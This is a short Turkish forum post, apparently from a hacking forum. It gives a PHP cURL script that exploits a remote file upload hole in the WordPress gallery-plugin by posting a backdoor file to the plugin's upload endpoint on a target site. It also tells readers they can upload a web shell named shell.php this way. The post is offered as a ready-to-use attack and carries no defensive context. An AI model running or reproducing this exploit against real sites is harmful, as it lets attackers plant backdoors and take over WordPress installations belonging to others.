Wordpress gallery-plugin adlı eklentide olan bir remote upload açığı sayesinde istediğimiz dosyayı yükletebiliyoruz <?php $uploadfile="backdoor.txt"; $ch =...

Wordpress
gallery-plugin adlı eklentide olan bir remote upload açığı sayesinde istediğimiz dosyayı yükletebiliyoruz

PHP:
<?php
 
$uploadfile="backdoor.txt";
$ch =
curl_init("http://hedef.com/wp-content/plugins/gallery-plugin/upload/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

php çalışmayan bir dizinden shell.php şeklinde karşı tarafa yükletebilirsinizde..
 
131,671Konular
3,270,237Mesajlar
315,727Kullanıcılar
merttcaanSon Üye
Üst Alt